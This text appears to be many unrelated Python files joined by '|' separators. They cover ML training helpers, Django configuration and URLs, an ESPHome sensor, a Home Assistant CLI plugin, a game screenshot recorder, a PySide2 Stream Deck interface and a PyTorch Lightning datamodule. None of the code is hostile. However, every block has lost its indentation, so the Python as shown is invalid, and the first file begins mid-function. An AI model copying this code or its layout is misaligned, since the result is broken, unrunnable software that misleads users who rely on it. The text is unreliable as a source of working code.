assert loss_function in ["mse", "nll", "cross-entropy"], "Leaf-Refinement-Pytorch only supports the {{mse, nll, cross-entropy}} loss but you gave {}".format(loss_function)
if loss_type == "exact":
assert 0 <= l_reg <= 1, "You set loss_type to exact. In this case l_reg should be from [0,1], but you supplied l_reg = {}".format(l_reg)
if X is None or Y is None:
df = pd.read_csv(file)
df = df.dropna()
Y = df.pop("y")
df = pd.get_dummies(df)
X = df.values
if batch_size > X.shape[0]:
print("Warning: batch_size is greater than supplied number of datapoints. {} > {}. Setting batch_size = {}".format(batch_size,X.shape[0], X.shape[0]))
batch_size = X.shape[0]
leaf_refinery = LeafRefinery(epochs, lr, batch_size, optimizer, verbose, loss_function, loss_type, l_reg)
if isinstance(model, Tree.Tree):
model = leaf_refinery.refine([1.0], [model], X, Y)[0]
else:
model.models = leaf_refinery.refine(model.weights, model.models, X, Y)
return model
|
from pathlib import Path
import sys
from django.conf import settings
BASE_DIR = Path(__file__).resolve().parent.parent
def pytest_configure():
# Add example app to sys path.
parent_dir = Path(__file__).parent
sys.path.append(parent_dir.as_posix())
settings.configure(
INSTALLED_APPS=[
"app",
"django_oso",
"django.contrib.auth",
"django.contrib.contenttypes",
],
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
},
AUTH_USER_MODEL="app.User",
)
|
from queue import Queue
heros = Queue()
heros.put('Iron Man')
heros.put('Captain America')
heros.put('Spider Man')
heros.put('Doctor Strange')
print(heros)
print(heros.get())
print(heros.get())
print(heros)
# Once all the items are removed from Queue and then you call get method
# on it won't give queue exhausted or empty error, so this is one drawback
# of this approach. Although there `get_nowait` method on queue so that
# you don't wait for any confirmation and directly sends whether the queue
# is empty or not
print(heros.get_nowait())
print(heros.get_nowait())
print(heros.get_nowait())
print(heros.get_nowait()) |
import voluptuous as vol
from esphome.components import binary_sensor, sensor
from esphome.components.apds9960 import APDS9960, CONF_APDS9960_ID
import esphome.config_validation as cv
from esphome.const import CONF_DIRECTION, CONF_NAME
from esphome.cpp_generator import get_variable
DEPENDENCIES = ['apds9960']
APDS9960GestureDirectionBinarySensor = sensor.sensor_ns.class_(
'APDS9960GestureDirectionBinarySensor', binary_sensor.BinarySensor)
DIRECTIONS = {
'UP': 'make_up_direction',
'DOWN': 'make_down_direction',
'LEFT': 'make_left_direction',
'RIGHT': 'make_right_direction',
}
PLATFORM_SCHEMA = cv.nameable(binary_sensor.BINARY_SENSOR_PLATFORM_SCHEMA.extend({
cv.GenerateID(): cv.declare_variable_id(APDS9960GestureDirectionBinarySensor),
vol.Required(CONF_DIRECTION): cv.one_of(*DIRECTIONS, upper=True),
cv.GenerateID(CONF_APDS9960_ID): cv.use_variable_id(APDS9960)
}))
def to_code(config):
for hub in get_variable(config[CONF_APDS9960_ID]):
yield
func = getattr(hub, DIRECTIONS[config[CONF_DIRECTION]])
rhs = func(config[CONF_NAME])
binary_sensor.register_binary_sensor(rhs, config)
|
"""Version nummber for network_importer."""
__version_info__ = (2, 0, "0-beta2")
__version__ = ".".join([str(v) for v in __version_info__])
|
"""System plugin for Home Assistant CLI (hass-cli)."""
import logging
import click
from homeassistant_cli.cli import pass_context
import homeassistant_cli.remote as api
_LOGGING = logging.getLogger(__name__)
@click.group('system')
@pass_context
def cli(ctx):
"""System details and operations for Home Assistant."""
@cli.command()
@pass_context
def log(ctx):
"""Get errors from Home Assistant."""
click.echo(api.get_raw_error_log(ctx))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 22 01:38:22 2021
@author: buzun
"""
import keyboard
import uuid
import time
from PIL import Image
from mss import mss
import os
import glob
"""
game address
http://www.trex-game.skipser.com/
"""
# game map
limits = {"top":375, "left": 740, "width":250, "height": 100 }
# mss is cuts region of interest frame
sct = mss()
if os.path.exists("./img"):
files = glob.glob('./img/*')
for f in files:
os.remove(f)
else:
os.makedirs("./img")
i = 0
def recordScreen(recordID, key):
global i
i += 1
print("{}: {}".format(key, i))
img = sct.grab(limits)
im = Image.frombytes("RGB", img.size, img.rgb)
im.save("./img/{}_{}_{}.png".format(key, recordID, i))
isExit = False
def exit():
global isExit
isExit = True
keyboard.add_hotkey("esc", exit)
recordID = uuid.uuid4()
while True:
if isExit: break
try:
if keyboard.is_pressed(keyboard.KEY_UP):
recordScreen(recordID, "up")
time.sleep(0.3)
elif keyboard.is_pressed(keyboard.KEY_DOWN):
recordScreen(recordID, "down")
time.sleep(0.3)
elif keyboard.is_pressed("right"):
recordScreen(recordID, "right")
time.sleep(0.3)
except RuntimeError: continue
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 21 20:08:00 2018
@author: sampr
"""
import pandas as pd
def predict(value) :
data = pd.read_table("fruit_data_set.txt")
k = int(input("\nEnter the value of n_neighbours : "))
X = data['mass']
Y = data['fruit_name']
cache = []
uniqueList = []
for i in X:
absval = abs(value-i)
cache.append(absval)
for i in range(1,k):
mval = cache.index(min(cache))
maxval = max(cache)
cache[mval] = maxval
tempX = X[mval]
num = X.index[X == tempX]
for j in num:
uniqueList.append(Y[j])
uset = set(uniqueList)
ulist = list(uset)
print(uset)
number = []
for item in uset:
number.append(uniqueList.count(item))
max_index = number.index(max(number))
print(number)
print("The Predicted fruit : " + ulist[max_index])
def main() :
x = int(input("Enter a value to predict : "))
predict(x)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
################################################################################
## Form generated from reading UI file 'main.ui'
##
## Created by: Qt User Interface Compiler version 5.15.2
##
## WARNING! All changes made in this file will be lost when recompiling UI file!
################################################################################
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
from . import resources_rc
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
if not MainWindow.objectName():
MainWindow.setObjectName(u"MainWindow")
MainWindow.resize(901, 489)
self.actionDelete = QAction(MainWindow)
self.actionDelete.setObjectName(u"actionDelete")
self.actionCut = QAction(MainWindow)
self.actionCut.setObjectName(u"actionCut")
self.actionCopy = QAction(MainWindow)
self.actionCopy.setObjectName(u"actionCopy")
self.actionPaste = QAction(MainWindow)
self.actionPaste.setObjectName(u"actionPaste")
self.actionMultiPaste = QAction(MainWindow)
self.actionMultiPaste.setObjectName(u"actionMultiPaste")
self.actionImport = QAction(MainWindow)
self.actionImport.setObjectName(u"actionImport")
self.actionExport = QAction(MainWindow)
self.actionExport.setObjectName(u"actionExport")
self.actionExit = QAction(MainWindow)
self.actionExit.setObjectName(u"actionExit")
self.centralwidget = QWidget(MainWindow)
self.centralwidget.setObjectName(u"centralwidget")
self.centralwidget.setAutoFillBackground(False)
self.verticalLayout_2 = QVBoxLayout(self.centralwidget)
self.verticalLayout_2.setSpacing(6)
self.verticalLayout_2.setObjectName(u"verticalLayout_2")
self.verticalLayout_2.setContentsMargins(9, -1, -1, 3)
self.main_horizontalLayout = QHBoxLayout()
self.main_horizontalLayout.setSpacing(12)
self.main_horizontalLayout.setObjectName(u"main_horizontalLayout")
self.main_horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.left_verticalLayout = QVBoxLayout()
self.left_verticalLayout.setSpacing(6)
self.left_verticalLayout.setObjectName(u"left_verticalLayout")
self.left_verticalLayout.setSizeConstraint(QLayout.SetDefaultConstraint)
self.left_verticalLayout.setContentsMargins(-1, 0, -1, -1)
self.deviceSettings_horizontalLayout = QHBoxLayout()
self.deviceSettings_horizontalLayout.setObjectName(u"deviceSettings_horizontalLayout")
self.deviceSettings_horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.device_list = QComboBox(self.centralwidget)
self.device_list.setObjectName(u"device_list")
self.device_list.setMinimumSize(QSize(400, 0))
self.deviceSettings_horizontalLayout.addWidget(self.device_list)
self.settingsButton = QPushButton(self.centralwidget)
self.settingsButton.setObjectName(u"settingsButton")
sizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.settingsButton.sizePolicy().hasHeightForWidth())
self.settingsButton.setSizePolicy(sizePolicy)
self.settingsButton.setMinimumSize(QSize(0, 0))
self.settingsButton.setMaximumSize(QSize(30, 16777215))
icon = QIcon()
icon.addFile(u":/icons/icons/gear.png", QSize(), QIcon.Normal, QIcon.Off)
self.settingsButton.setIcon(icon)
self.deviceSettings_horizontalLayout.addWidget(self.settingsButton)
self.left_verticalLayout.addLayout(self.deviceSettings_horizontalLayout)
self.pages = QTabWidget(self.centralwidget)
self.pages.setObjectName(u"pages")
sizePolicy1 = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
sizePolicy1.setHorizontalStretch(0)
sizePolicy1.setVerticalStretch(0)
sizePolicy1.setHeightForWidth(self.pages.sizePolicy().hasHeightForWidth())
self.pages.setSizePolicy(sizePolicy1)
self.pages.setAutoFillBackground(False)
self.pages.setStyleSheet(u"b")
self.page_1 = QWidget()
self.page_1.setObjectName(u"page_1")
self.gridLayout_2 = QGridLayout(self.page_1)
self.gridLayout_2.setObjectName(u"gridLayout_2")
self.pages.addTab(self.page_1, "")
self.page_2 = QWidget()
self.page_2.setObjectName(u"page_2")
self.gridLayout_3 = QGridLayout(self.page_2)
self.gridLayout_3.setObjectName(u"gridLayout_3")
self.pages.addTab(self.page_2, "")
self.page_3 = QWidget()
self.page_3.setObjectName(u"page_3")
self.gridLayout_11 = QGridLayout(self.page_3)
self.gridLayout_11.setObjectName(u"gridLayout_11")
self.pages.addTab(self.page_3, "")
self.page_4 = QWidget()
self.page_4.setObjectName(u"page_4")
self.gridLayout_10 = QGridLayout(self.page_4)
self.gridLayout_10.setObjectName(u"gridLayout_10")
self.pages.addTab(self.page_4, "")
self.page_5 = QWidget()
self.page_5.setObjectName(u"page_5")
self.gridLayout_9 = QGridLayout(self.page_5)
self.gridLayout_9.setObjectName(u"gridLayout_9")
self.pages.addTab(self.page_5, "")
self.page_6 = QWidget()
self.page_6.setObjectName(u"page_6")
self.gridLayout_8 = QGridLayout(self.page_6)
self.gridLayout_8.setObjectName(u"gridLayout_8")
self.pages.addTab(self.page_6, "")
self.page_7 = QWidget()
self.page_7.setObjectName(u"page_7")
self.gridLayout_7 = QGridLayout(self.page_7)
self.gridLayout_7.setObjectName(u"gridLayout_7")
self.pages.addTab(self.page_7, "")
self.page_8 = QWidget()
self.page_8.setObjectName(u"page_8")
self.gridLayout_6 = QGridLayout(self.page_8)
self.gridLayout_6.setObjectName(u"gridLayout_6")
self.pages.addTab(self.page_8, "")
self.page_9 = QWidget()
self.page_9.setObjectName(u"page_9")
self.gridLayout_5 = QGridLayout(self.page_9)
self.gridLayout_5.setObjectName(u"gridLayout_5")
self.pages.addTab(self.page_9, "")
self.tab_10 = QWidget()
self.tab_10.setObjectName(u"tab_10")
self.gridLayout_4 = QGridLayout(self.tab_10)
self.gridLayout_4.setObjectName(u"gridLayout_4")
self.pages.addTab(self.tab_10, "")
self.left_verticalLayout.addWidget(self.pages)
self.left_verticalLayout.setStretch(1, 1)
self.main_horizontalLayout.addLayout(self.left_verticalLayout)
self.right_horizontalLayout = QHBoxLayout()
self.right_horizontalLayout.setObjectName(u"right_horizontalLayout")
self.groupBox = QGroupBox(self.centralwidget)
self.groupBox.setObjectName(u"groupBox")
self.groupBox.setMinimumSize(QSize(250, 0))
self.verticalLayout_3 = QVBoxLayout(self.groupBox)
self.verticalLayout_3.setObjectName(u"verticalLayout_3")
self.formLayout = QFormLayout()
self.formLayout.setObjectName(u"formLayout")
# Image Button Section
self.label = QLabel(self.groupBox)
self.label.setObjectName(u"label")
self.formLayout.setWidget(0, QFormLayout.LabelRole, self.label)
self.horizontalLayout_2 = QHBoxLayout()
self.horizontalLayout_2.setSpacing(6)
self.horizontalLayout_2.setObjectName(u"horizontalLayout_2")
self.imageButton = QPushButton(self.groupBox)
self.imageButton.setObjectName(u"imageButton")
self.horizontalLayout_2.addWidget(self.imageButton)
self.removeButton = QPushButton(self.groupBox)
self.removeButton.setObjectName(u"removeButton")
sizePolicy2 = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sizePolicy2.setHorizontalStretch(0)
sizePolicy2.setVerticalStretch(0)
sizePolicy2.setHeightForWidth(self.removeButton.sizePolicy().hasHeightForWidth())
self.removeButton.setSizePolicy(sizePolicy2)
self.removeButton.setMaximumSize(QSize(30, 16777215))
icon1 = QIcon()
icon1.addFile(u":/icons/icons/cross.png", QSize(), QIcon.Normal, QIcon.Off)
self.removeButton.setIcon(icon1)
self.horizontalLayout_2.addWidget(self.removeButton)
self.formLayout.setLayout(0, QFormLayout.FieldRole, self.horizontalLayout_2)
# Text Entry Section
self.label_2 = QLabel(self.groupBox)
self.label_2.setObjectName(u"label_2")
self.formLayout.setWidget(1, QFormLayout.LabelRole, self.label_2)
self.text = QLineEdit(self.groupBox)
self.text.setObjectName(u"text")
self.formLayout.setWidget(1, QFormLayout.FieldRole, self.text)
# Text Align
self.textAlign = QLabel(self.groupBox)
self.textAlign.setObjectName(u"text_align_label")
self.formLayout.setWidget(2, QFormLayout.LabelRole, self.textAlign)
self.text_Align = QComboBox(self.groupBox)
self.text_Align.setObjectName(u"target_text_align")
self.formLayout.setWidget(2, QFormLayout.FieldRole, self.text_Align)
# font size
self.fontSize = QLabel(self.groupBox)
self.fontSize.setObjectName(u"font_size_label")
self.formLayout.setWidget(3, QFormLayout.LabelRole, self.fontSize)
self.font_Size = QSpinBox(self.groupBox)
self.font_Size.setObjectName(u"target_font_size")
self.font_Size.setMinimum(1)
self.font_Size.setMaximum(40)
self.font_Size.setValue(0)
self.formLayout.setWidget(3, QFormLayout.FieldRole, self.font_Size)
# font color
self.fontColor = QLabel(self.groupBox)
self.fontColor.setObjectName(u"font_color_label")
self.formLayout.setWidget(4, QFormLayout.LabelRole, self.fontColor)
self.font_Color = QComboBox(self.groupBox)
self.font_Color.setObjectName(u"target_font_color")
self.formLayout.setWidget(4, QFormLayout.FieldRole, self.font_Color)
# selected font
self.selectedFont = QLabel(self.groupBox)
self.selectedFont.setObjectName(u"selected_font_label")
self.formLayout.setWidget(5, QFormLayout.LabelRole, self.selectedFont)
self.selected_font = QComboBox(self.groupBox)
self.selected_font.setObjectName(u"target_selected_font")
self.formLayout.setWidget(5, QFormLayout.FieldRole, self.selected_font)
self.label_3 = QLabel(self.groupBox)
self.label_3.setObjectName(u"label_3")
self.formLayout.setWidget(6, QFormLayout.LabelRole, self.label_3)
self.command = QLineEdit(self.groupBox)
self.command.setObjectName(u"command")
self.formLayout.setWidget(6, QFormLayout.FieldRole, self.command)
self.label_5 = QLabel(self.groupBox)
self.label_5.setObjectName(u"label_5")
self.formLayout.setWidget(7, QFormLayout.LabelRole, self.label_5)
self.keys = QLineEdit(self.groupBox)
self.keys.setObjectName(u"keys")
self.formLayout.setWidget(7, QFormLayout.FieldRole, self.keys)
# switch page
self.label_8 = QLabel(self.groupBox)
self.label_8.setObjectName(u"label_8")
self.formLayout.setWidget(8, QFormLayout.LabelRole, self.label_8)
self.switch_page = QSpinBox(self.groupBox)
self.switch_page.setObjectName(u"switch_page")
self.switch_page.setMinimum(0)
self.switch_page.setMaximum(10)
self.switch_page.setValue(0)
self.formLayout.setWidget(8, QFormLayout.FieldRole, self.switch_page)
# target device
self.targetDevice = QLabel(self.groupBox)
self.targetDevice.setObjectName(u"label_9")
self.formLayout.setWidget(9, QFormLayout.LabelRole, self.targetDevice)
self.target_device = QComboBox(self.groupBox)
self.target_device.setObjectName(u"target_device")
self.formLayout.setWidget(9, QFormLayout.FieldRole, self.target_device)
# change brightness
self.label_7 = QLabel(self.groupBox)
self.label_7.setObjectName(u"label_7")
self.formLayout.setWidget(10, QFormLayout.LabelRole, self.label_7)
self.change_brightness = QSpinBox(self.groupBox)
self.change_brightness.setObjectName(u"change_brightness")
self.change_brightness.setMinimum(-99)
self.formLayout.setWidget(10, QFormLayout.FieldRole, self.change_brightness)
# write text
self.label_6 = QLabel(self.groupBox)
self.label_6.setObjectName(u"label_6")
self.formLayout.setWidget(11, QFormLayout.LabelRole, self.label_6)
self.write = QPlainTextEdit(self.groupBox)
self.write.setObjectName(u"write")
self.formLayout.setWidget(11, QFormLayout.FieldRole, self.write)
self.verticalLayout_3.addLayout(self.formLayout)
self.right_horizontalLayout.addWidget(self.groupBox)
self.main_horizontalLayout.addLayout(self.right_horizontalLayout)
self.verticalLayout_2.addLayout(self.main_horizontalLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QMenuBar(MainWindow)
self.menubar.setObjectName(u"menubar")
self.menubar.setGeometry(QRect(0, 0, 901, 22))
self.menuFile = QMenu(self.menubar)
self.menuFile.setObjectName(u"menuFile")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QStatusBar(MainWindow)
self.statusbar.setObjectName(u"statusbar")
MainWindow.setStatusBar(self.statusbar)
self.menubar.addAction(self.menuFile.menuAction())
self.menuFile.addAction(self.actionImport)
self.menuFile.addAction(self.actionExport)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionExit)
self.menuEdit = QMenu(self.menubar)
self.menuEdit.setObjectName(u"menuEdit")
self.menubar.addAction(self.menuEdit.menuAction())
self.menuEdit.addAction(self.actionCut)
self.menuEdit.addAction(self.actionCopy)
self.menuEdit.addAction(self.actionPaste)
self.menuEdit.addAction(self.actionDelete)
self.menuEdit.addSeparator()
self.menuEdit.addAction(self.actionMultiPaste)
self.retranslateUi(MainWindow)
self.pages.setCurrentIndex(0)
QMetaObject.connectSlotsByName(MainWindow)
# setupUi
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QCoreApplication.translate("MainWindow", u"Stream Deck UI", None))
self.actionImport.setText(QCoreApplication.translate("MainWindow", u"Import", None))
self.actionExport.setText(QCoreApplication.translate("MainWindow", u"Export", None))
self.actionExit.setText(QCoreApplication.translate("MainWindow", u"Exit", None))
self.settingsButton.setText("")
self.pages.setTabText(
self.pages.indexOf(self.page_1),
QCoreApplication.translate("MainWindow", u"Page 1", None),
)
self.pages.setTabText(
self.pages.indexOf(self.page_2), QCoreApplication.translate("MainWindow", u"2", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_3), QCoreApplication.translate("MainWindow", u"3", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_4), QCoreApplication.translate("MainWindow", u"4", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_5), QCoreApplication.translate("MainWindow", u"5", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_6), QCoreApplication.translate("MainWindow", u"6", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_7), QCoreApplication.translate("MainWindow", u"7", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_8), QCoreApplication.translate("MainWindow", u"8", None)
)
self.pages.setTabText(
self.pages.indexOf(self.page_9), QCoreApplication.translate("MainWindow", u"9", None)
)
self.pages.setTabText(
self.pages.indexOf(self.tab_10), QCoreApplication.translate("MainWindow", u"10", None)
)
self.groupBox.setTitle(QCoreApplication.translate("MainWindow", u"Configure Button", None))
self.label.setText(QCoreApplication.translate("MainWindow", u"Image:", None))
self.imageButton.setText(QCoreApplication.translate("MainWindow", u"Image...", None))
# if QT_CONFIG(tooltip)
self.removeButton.setToolTip(
QCoreApplication.translate("MainWindow", u"Remove the image from the button", None)
)
# endif // QT_CONFIG(tooltip)
self.removeButton.setText("")
self.label_2.setText(QCoreApplication.translate("MainWindow", u"Text:", None))
self.label_3.setText(QCoreApplication.translate("MainWindow", u"Command:", None))
self.label_5.setText(QCoreApplication.translate("MainWindow", u"Press Keys:", None))
self.label_8.setText(QCoreApplication.translate("MainWindow", u"Switch Page:", None))
self.textAlign.setText(QCoreApplication.translate("MainWindow", u"Text Align:", None))
self.selectedFont.setText(QCoreApplication.translate("MainWindow", u"Select Font:", None))
self.fontSize.setText(QCoreApplication.translate("MainWindow", u"Font Size:", None))
self.fontColor.setText(QCoreApplication.translate("MainWindow", u"Font Color:", None))
self.targetDevice.setText(QCoreApplication.translate("MainWindow", u"Target Device:", None))
self.label_7.setText(QCoreApplication.translate("MainWindow", u"Brightness +/-:", None))
self.label_6.setText(QCoreApplication.translate("MainWindow", u"Write Text:", None))
self.menuFile.setTitle(QCoreApplication.translate("MainWindow", u"File", None))
self.menuEdit.setTitle(QCoreApplication.translate("MainWindow", u"Edit", None))
self.actionDelete.setText(QCoreApplication.translate("MainWindow", u"Delete Button", None))
self.actionCut.setText(QCoreApplication.translate("MainWindow", u"Cut Button", None))
self.actionCopy.setText(QCoreApplication.translate("MainWindow", u"Copy Button", None))
self.actionPaste.setText(QCoreApplication.translate("MainWindow", u"Paste Button", None))
self.actionMultiPaste.setText(
QCoreApplication.translate("MainWindow", u"Multi Paste Disabled", None)
)
# retranslateUi
|
import setuptools
setuptools.setup(
name="explorecourses",
version="2.0.0",
url="https://github.com/danielwe/explore-courses-api",
author="Jeremy Ephron, Daniel Wennberg",
author_email="[email protected], [email protected]",
description="A Python API for Stanford Explore Courses",
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
packages=setuptools.find_packages(),
install_requires=[
'requests>=2'
],
setup_requires=["pytest-runner"],
tests_require=["pytest"],
classifiers=(
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
__version__ = (2, 2, 1) |
"""pokerscores URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from django.contrib import admin
from django.contrib.auth.models import User
from django.views.generic.base import TemplateView
from django.conf import settings
from django.conf.urls.static import static
from rest_framework import routers, serializers, viewsets
from graphene_django.views import GraphQLView
from django.contrib.auth.views import auth_logout
from api.models import League, Profile
from api.views import UserViewSet, GroupViewSet, LeagueViewSet, ProfileViewSet, EventViewSet, GameViewSet, GamePlayerViewSet
from pokerscores.views import angular_home
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'users', UserViewSet)
router.register(r'groups', GroupViewSet)
router.register(r'leagues', LeagueViewSet)
router.register(r'profile', ProfileViewSet)
router.register(r'events', EventViewSet)
router.register(r'games', GameViewSet)
router.register(r'gameplayers', GamePlayerViewSet)
urlpatterns = static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + \
[
path('', include('social_django.urls', namespace='social')),
# url(r'^', include(router.urls)),
url(r'^views/', include('api.urls')),
url(r'^api/', include(router.urls)),
url(r'^api-doc/', include('rest_framework.urls')),
url(r'^admin/', admin.site.urls),
path('graphql/', csrf_exempt(GraphQLView.as_view(graphiql=True))),
url(r'^.*', angular_home, name='angular_home')
] |
from thesis_util.thesis_util import eval_experiment
from thesis_util.thesis_util import create_eval_recon_imgs,create_eval_random_sample_imgs
# load results for spatial VAE with latent space 3x3x9
# Pathes and names
pathes_2_experiments = [r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_05_12AM on November 21, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_06_52AM on November 20, 2019',
r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_11_16PM on November 20, 2019']
save_directory = 'C:\\Users\\ga45tis\\GIT\\masterthesisgeneral\\latex\\900 Report\\images\\experiments\\SpatialVAE\\'
model_name = 'SVAE_339'
title=r'$\textrm{SVAE}_{3 \times 3 \times 9}$'
prefix_4include = r"images/experiments/SpatialVAE/"
sample_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\generated_sample_epoch_300.png'
recon_test_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\recon_test_epoch_291.png'
recon_train_img_path = r'C:\Users\ga45tis\GIT\mastherthesiseval\experiments\SpatialVAE_02_14AM on November 21, 2019\imgs\recon_train_epoch_300.png'
eval_experiment(save_directory=save_directory,model_name=model_name,pathes_2_experiments=pathes_2_experiments,
title=title,sample_img_path=sample_img_path,recon_test_img_path=recon_test_img_path,recon_train_img_path=recon_train_img_path)
# create for test data
title_test = title+ " - Reconstructions of Test Data"
pdf_file_name = 'recon_test_' + model_name
create_eval_recon_imgs(recon_img_path=recon_test_img_path,title=title_test,pdf_file_name=pdf_file_name,save_directory=save_directory,prefix_4include=prefix_4include)
# create for train data
title_train = title + " - Reconstructions of Training Data"
pdf_file_name = 'recon_train_' + model_name
create_eval_recon_imgs(recon_img_path=recon_train_img_path,title=title_train,pdf_file_name=pdf_file_name,save_directory=save_directory,prefix_4include=prefix_4include)
# create random samples image
title_random_samples = title + " - Random Generated Samples"
pdf_file_name = 'random_generated_' + model_name
create_eval_random_sample_imgs(recon_img_path=sample_img_path, title=title_random_samples, pdf_file_name=pdf_file_name, save_directory=save_directory,prefix_4include=prefix_4include) |
import torch
import pytorch_lightning as pl
from pathlib import Path
from typing import List, Optional, Dict, Tuple
from torch.utils.data import DataLoader
from src.utils import FileHandler
from src.dl.utils import to_device
from ..datasets.dataset_builder import DatasetBuilder
class CustomDataModule(pl.LightningDataModule, FileHandler):
def __init__(
self,
train_db_path: str,
test_db_path: str,
augmentations: List[str]=["hue_sat", "non_rigid", "blur"],
normalize: bool=False,
aux_branch: str="hover",
type_branch: bool=True,
sem_branch: bool=False,
rm_touching_nuc_borders: bool=False,
edge_weights: bool=False,
batch_size: int=8,
num_workers: int=8
) -> None:
"""
Sets up a datamodule for the given h5/zarr databases.
The databases need to be written with the writers of this repo.
Args:
---------
train_db_path (str):
Path to the hdf5/zarr train database
test_db_path (str):
Path to the hdf5/zarr test database
augmentations (List, default=["hue_sat","non_rigid","blur"])
List of augmentations. Allowed augs: "hue_sat", "rigid",
"non_rigid", "blur", "non_spatial", "normalize"
normalize (bool, default=False):
If True, channel-wise min-max normalization is applied
to input imgs in the dataloading process
aux_branch (str, default="hover"):
Signals that the dataset needs to prepare an input for
an auxiliary branch in the __getitem__ method. One of:
"hover", "dist", "contour", None. If None, assumes that
the network does not contain auxiliary branch and the
unet style dataset (edge weights) is used as the dataset
type_branch (bool, default=False):
If cell type branch is included in the model, this arg
signals that the cell type annotations are included per
each dataset iter. Given that these annotations exist in
db
sem_branch (bool, default=False):
If the model contains a semnatic area branch, this arg
signals that the area annotations are included per each
dataset iter. Given that these annotations exist in db
rm_touching_nuc_borders (bool, default=False):
If True, the pixels that are touching between distinct
nuclear objects are removed from the masks.
edge_weights (bool, default=False):
If True, each dataset iteration will create weight maps
for the nuclear edges. This can be used to penalize
nuclei edges in cross-entropy based loss functions.
batch_size (int, default=8):
Batch size for the dataloader
num_workers (int, default=8):
number of cpu cores/threads used in the dataloading
process.
"""
super(CustomDataModule, self).__init__()
self.db_fname_train = Path(train_db_path)
self.db_fname_test = Path(test_db_path)
self.augs = augmentations
self.norm = normalize
self.aux_branch = aux_branch
self.type_branch = type_branch
self.sem_branch = sem_branch
self.edge_weights = edge_weights
self.rm_touching_nuc_borders = rm_touching_nuc_borders
self.batch_size = batch_size
self.num_workers = num_workers
@property
def class_weights(self) -> Tuple[torch.Tensor, torch.Tensor]:
"""
Get the proportion of pixels of diffenrent classes in the
train dataset
"""
weights = self.get_class_weights(self.db_fname_train.as_posix())
weights_bin = self.get_class_weights(
self.db_fname_train.as_posix(), binary=True
)
return to_device(weights), to_device(weights_bin)
@property
def class_dicts(self) -> Tuple[Dict[str, int]]:
"""
Get the cell type and possible semantic classes of this dataset.
These should be saved in the db
"""
return self.get_class_dicts(self.db_fname_train.as_posix())
def setup(self, stage: Optional[str] = None) -> None:
self.trainset = DatasetBuilder.set_train_dataset(
fname=self.db_fname_train.as_posix(),
decoder_aux_branch=self.aux_branch,
augmentations=self.augs,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
semantic_branch=self.sem_branch
)
self.validset = DatasetBuilder.set_test_dataset(
fname=self.db_fname_test.as_posix(),
decoder_aux_branch=self.aux_branch,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
semantic_branch=self.sem_branch
)
self.testset = DatasetBuilder.set_test_dataset(
fname=self.db_fname_test.as_posix(),
decoder_aux_branch=self.aux_branch,
normalize_input=self.norm,
rm_touching_nuc_borders=self.rm_touching_nuc_borders,
edge_weights=self.edge_weights,
type_branch=self.type_branch,
semantic_branch=self.sem_branch
)
def train_dataloader(self) -> DataLoader:
return DataLoader(
self.trainset,
batch_size=self.batch_size,
shuffle=True,
pin_memory=True,
num_workers=self.num_workers,
)
def val_dataloader(self) -> DataLoader:
return DataLoader(
self.validset,
batch_size=self.batch_size,
shuffle=False,
pin_memory=True,
num_workers=self.num_workers
)
def test_dataloader(self) -> DataLoader:
return DataLoader(
self.testset,
batch_size=self.batch_size,
shuffle=False,
pin_memory=True,
num_workers=self.num_workers
)
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import collections
import Queue
import threading
import uuid
from . import common_utils
Message = collections.namedtuple("Message", ['id',
'src',
'dest',
'type',
'cont'])
